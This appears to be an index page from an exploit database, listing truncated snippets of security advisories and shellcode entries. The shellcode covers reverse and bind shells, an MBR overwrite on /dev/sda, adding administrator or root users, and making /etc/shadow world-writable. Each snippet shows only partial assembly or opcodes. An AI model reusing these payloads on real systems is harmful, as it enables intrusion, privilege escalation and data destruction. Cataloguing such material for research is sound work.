[DLA 25-1] python2.6 security update

Package : python2.6 Version : 2.6.6-8+deb6u1 CVE ID : CVE-2011-1015 CVE-2011-1521 CVE-2011-4940 CVE-2011-4944 CVE-2012-0845 CVE-2012-1150 CVE-2013-4238 CVE-2014-1912 Multiple vulnerabilities were discovered in python2.6. The more relevant are: CVE-2013-4238 Incorrect handling of NUL bytes in...

Linux/x86 - Reverse TCP (127.1.1.1:1337/TCP) Shell Shellcode (74 bytes)

Linux/x86 - Reverse TCP 127.1.1.1:1337/TCP Shell Shellcode 74 bytes. Shellcode exploit for Linuxx86 platform / Title: Shell Reverse TCP Shellcode - 74 bytes Platform: Linux/x86 Date: 2014-07-25 Author: Julien Ahrens @MrTuxracer Website: http://www.rcesecurity.com Disassembly of section .text:...

HP Smart Update Manager 6.x < 6.4.1 Multiple Vulnerabilities

The version of HP Smart Update manager running on the remote host is prior to 6.4.1. It is, therefore, affected by the following vulnerabilities : - An error exists in the function 'ssl3readbytes' that can allow data to be injected into other sessions or allow denial of service attacks. Note that...

Linux x86 - Socket Re-use Shellcode 50 bytes

Linux x86 - Socket Re-use Shellcode 50 bytes. CVE-2014-4943. Shellcode exploit for linx86 platform / Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes Made using sockfd trick + dup20,0, dup20,1, dup20,2 + execve /bin/sh Thanks: Charles Stevenson, ipv, 3LRVS research team gcc -o...

Linux/x86 - Bind TCP (1337/TCP) Shell Shellcode (89 bytes)

Linux/x86 - Bind TCP 1337/TCP Shell Shellcode 89 bytes. Shellcode exploit for Linuxx86 platform / Title: Shell Bind TCP Shellcode Port 1337 - 89 bytes Platform: Linux/x86 Date: 2014-07-13 Author: Julien Ahrens @MrTuxracer Website: http://www.rcesecurity.com Disassembly of section .text: 00000000 ...

linux/x86 overwrite MBR on /dev/sda with `LOL!' 43 bytes

No description provided by source. ; linux/x86 overwrite MBR on /dev/sda with LOL!' 43 bytes ; root@thegibson ; 2010-01-15 section .text global start start: ; open/dev/sda, OWRONLY; mov al, 5 xor ecx, ecx push ecx push dword 0x6164732f push dword 0x7665642f mov ebx, esp inc ecx int 0x80 ; writefd...

PyPAM - Python bindings for PAM - Double Free Corruption

No description provided by source. === LSE Leading Security Experts - Security Advisory 2012-03-01 === PyPAM -- Python bindings for PAM - Double Free Corruption --------------------------------------------------------- Affected Versions ================= PyPAM = 0.4.2 Red Hat PyPAM = 0.5.0-12...

Windows Xp Home Edition SP2 English (calc.exe) 37 bytes

No description provided by source. / Windows Xp Home edition SP2 english calc.exe 37 bytes shellcode by: Hazem mofeed Aka Hakxer penetration testing labs www.pentestlabs.com / char evil = \xeb\x16\x5b\x31\xc0\x50\x53\xbb\x8d\x15\x86\x7c\xff\xd3\x31\xc0...

Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2)

No description provided by source. source: http://www.securityfocus.com/bid/20365/info Multiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it...

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

No description provided by source. / Title: win32/xp pro sp3 EN 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos secuid0 - anastasiosmatgmaildotcom Method: Hardcoded opcodes kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa Tested on: WinXP Pro SP3 EN 32bit - Buil...

34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode

No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 34 bytes setreudgetuid, getuid & execve/bin/sh shellcode Platform: Linux x86 setreuidgetuid, getuid; execve/bin/sh; gcc -Wl,-z,execstack...

webgrind 1.0 (file param) Local File Inclusion Vulnerability

No description provided by source. webgrind 1.0 file param Local File Inclusion Vulnerability Vendor: Joakim Nygard and Jacob Oettinger Product web page: http://code.google.com/p/webgrind Affected version: 1.0 v1.02 in trunk on github Summary: Webgrind is an Xdebug profiling web frontend in PHP5...

Linux/MIPS - add user(UID 0) with password - 164 bytes

No description provided by source. / Title: Linux/MIPS -add userUID 0 with password - 164 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com Note: Username - rOOt Password - pwn3d / include stdio.h char sc = \x24\x09\x73\x50 // li t1,29520 \x05\x30\xff\xff // bltzal t1,400094 L...

myMP3-Player 3.0 - Buffer Overflow Exploit

No description provided by source. Exploit Title: myMP3-Player 3.0 NOT SEH Overwrite Date: 8 / 8 / 2010 Author: Oh Yaw Theng Software Link: http://www.chip.de/downloads/myMP3-Player-3.013008621.html Version: 3.0 Tested on: Windows XP SP 2 CVE : N / A !/usr/bin/python filename = crash.m3u junk =...

iManager Plugin 1.2.8 (lang) - Local File Inclusion Vulnerability

No description provided by source. iManager Plugin v1.2.8 lang Local File Inclusion Vulnerability Vendor: net4visions.com Product web page: http://www.net4visions.com Affected version: = 1.2.8 Build 02012008 Summary: With iManager you can manage your files/images on your webserver, and it provide...

freebsd/x86 execve /bin/sh 23 bytes (2)

No description provided by source. / FreeBSD 23 byte execve code. Greetz to anathema, the first who published this way of writing shellcodes. greetz to preedator marcetam [email protected] / char fbsdexecve= \x99 / cdq / \x52 / push %edx / \x68\x6e\x2f\x73\x68 / push $0x68732f6e /...

Vavoom 1.24 str.cpp VStr::Resize Function Crafted UDP Packet Remote DoS

No description provided by source. source: http://www.securityfocus.com/bid/25436/info Vavoom is prone to multiple remote vulnerabilities, including a buffer-overflow issue, a format-string issue, and a denial-of-service issue. An attacker can exploit these issues to execute arbitrary code within...

freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes

No description provided by source. / FreeBSD shellcode chown/tmp/sh, 0, 0; chmod/tmp/sh, 06755; 44 bytes Claes M. Nyberg 20020209 [email protected], [email protected] / / void mainvoid asm xor %eax, %eax eax = 0 pushl %eax string ends with NULL pushl $0x68732f2f push 'hs//' //sh pushl...

linux/x86 Shellcode Polymorphic chmod("/etc/shadow",666) 54 bytes

No description provided by source. / Title : Linux/x86 - Shellcode Polymorphic chmod/etc/shadow,666 & exit - 54 bytes Encode : ADD Author : Jonathan Salwan Mail : submit ! shell-storm.org ! Database of shellcodes = http://www.shell-storm.org/shellcode/ Informations chmod & exit:...

linux/x86 bindport 8000 & add user with root access 225+ bytes

No description provided by source. ; ; Title : Bindport TCP/8000 & execve add user with access root ; os : Linux x86 ; size : 225+ bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ...